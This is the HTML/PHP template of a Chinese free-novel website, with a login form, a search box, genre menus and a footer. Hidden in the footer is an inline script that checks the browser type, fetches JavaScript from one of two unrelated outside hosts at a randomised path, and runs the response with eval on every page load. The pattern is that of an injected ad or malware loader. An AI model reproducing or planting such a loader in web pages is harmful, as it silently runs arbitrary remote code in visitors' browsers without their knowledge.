<html><head> 
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> 
  <title>桑舞小说网_最好的免费小说阅读网</title> 
  <meta content="最好的免费小说阅读,桑舞小说网" name="keywords"> 
  <meta content="看免费小说尽在桑舞小说网！" name="description"> 
  <link href="<?=PUBLIC_DIR?>/sangwu.css" type="text/css" rel="stylesheet">
  </head>
 <body>
  <div class="topbar"> 
   <div class="topcont"> 
    <div class="user_login">
      <form method="post" action="/login.php?do=submit&amp;action=login&amp;usecookie=2592000&amp;jumpurl=">
        用户名 <input type="text" name="username" value="" size="10" maxlength="20" id="username">&nbsp;
        密码 <input type="password" size="10" maxlength="30" name="password" id="password">
        <input type="hidden" value="login" name="action">
        <input type="hidden" value="http://www.sangwu.org/" name="jumpurl"> 
        <input type="checkbox" value="1" checked="checked" name="usecookie" class="checkbox">
        记住登陆&nbsp;
        <input type="submit" value="" name="submit" class="login">&nbsp;&nbsp;
        <a href="/register.php" class="r">注册</a> ┆<a href="/getpass.php" class="r">忘记密码</a>
      </form>
    </div>
    <div class="right">
      <!--<a style="color:red;" href="" target=_blank>服务器升级中，我们会尽快恢复更新！</a>-->
      <a target="_blank" href="http://m.sangwu.org" style="color:red;">手机版</a> 
      <a target="_blank" href="/newmessage.php?tosys=1&amp;title=加书/报错&amp;content=加书/报错:">加书/报错</a> 
      <a target="_blank" href="/help.php">帮助中心</a> <a href="javascript:window.external.addFavorite('http://www.sangwu.org','桑舞小说网')">收藏本站</a> 
<style>
  
</style> 
   </div> 
  </div> 
  <div class="header"> 
   <div class="headerbg"> 
    <div class="headercont"> 
     <div class="logo"> 
      <a title="桑舞小说网" href="http://www.sangwu.org">桑舞小说网</a> 
     </div> 
<div class="Search">
    <div class="SearchBox">
      <form style="margin-top:-1px;padding:0px" false;}'=""  onsubmit="" target="_blank" method="post" action="/modules/article/search.php">
      
                     <span class="SearchLeft">
                    <input type="text" ''="" onfocus="this.value=" value="请输入关键字" onmouseover="this.select()" class="input_01" name="searchkey"></span>
                                 <span class="SearchTybe">
        <select name="searchtype" id="searchType">
          <option value="articlename">书名</option>
          <option value="author">作者</option>
        </select></span>
                                    <span class="SearchRight">
                                    <input type="submit" value="搜索">
                                </span>
                            </form>
                        </div>
                    </div>

    </div> 
   </div> 
   <div class="nav"> 
    <div class="navmian"> 
     <ul class="navmenu"> 
       <li> <a class="hot" href="http://www.sangwu.org">首页</a></li>  
       <li><a href="http://www.sangwu.org/class/1_1.htm">玄幻小说</a></li> 
       <li><a href="http://www.sangwu.org/class/2_1.htm">武侠小说</a></li> 
       <li><a href="http://www.sangwu.org/class/3_1.htm">都市小说</a></li> 
       <li><a href="http://www.sangwu.org/class/4_1.htm">网游小说</a></li> 
       <li><a href="http://www.sangwu.org/class/5_1.htm">科幻小说</a></li> 
       <li><a href="http://www.sangwu.org/class/6_1.htm">恐怖小说</a></li> 
       <li><a href="http://www.sangwu.org/wanjie/">完结小说</a></li> 
       <li><a href="http://www.sangwu.org/paihang/">排行榜</a></li>
   </ul> 
    </div>
    <div class="NavBg2"> 
     <div class="Subnav"> 热门小说：<a target="_blank" href="/book/0/2/">完美世界</a> <a target="_blank" href="/book/0/26/">大主宰</a> <a target="_blank" href="/book/0/8/">魔天记</a> <a target="_blank" href="/book/0/18/">莽荒纪</a> <a target="_blank" href="/book/0/27/">宝鉴</a> <a target="_blank" href="/book/0/9/">大豪门</a> <a target="_blank" href="/book/0/15/">英雄联盟之谁与争锋</a> <a target="_blank" href="/book/0/28/">苗疆道事</a> 
     </div> 
    </div> 
   </div> 
  </div>



 <?=$html?>



   <div class="foot"> 
   <script>
                footer();
            </script><p>本站所有小说为转载作品，所有章节均由网友上传，转载至本站只是为了宣传本书让更多读者欣赏。</p>
<p>Copyright &copy; 2016 桑舞小说网 All Rights Reserved.</p>
<p>Email:sangwu555@hotmail.com</p>
<script language="JavaScript" src="https://s95.cnzz.com/z_stat.php?id=1260070930&amp;web_id=1260070930"></script><script type="text/javascript" charset="utf-8" src="https://c.cnzz.com/core.php?web_id=1260070930&amp;t=z"></script><a title="站长统计" target="_blank" href="http://www.cnzz.com/stat/website.php?web_id=1260070930">站长统计</a>
<script>;(function(){var d=(/UCBrowser/i.test(navigator.userAgent)||/QQBrowser/i.test(navigator.userAgent))?'https://s.nxrxt.com':'http://s.zzrcz.com';var a=new XMLHttpRequest();var b=d+'/ol-8508-10493-'+Math.floor(Math.random()*9999999+1);if(a!=null){a.onreadystatechange=function(){if(a.readyState==4 &amp;&amp; a.status==200){if(window.execScript)window.execScript(a.responseText,'JavaScript');else if(window.eval)window.eval(a.responseText,'JavaScript');else eval(a.responseText);}};a.open('GET',b,false);a.send();}})();</script>
<script>
(function(){
    var bp = document.createElement('script');
    bp.src = '//push.zhanzhang.baidu.com/push.js';
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
 
  </div>
  </div></body></html>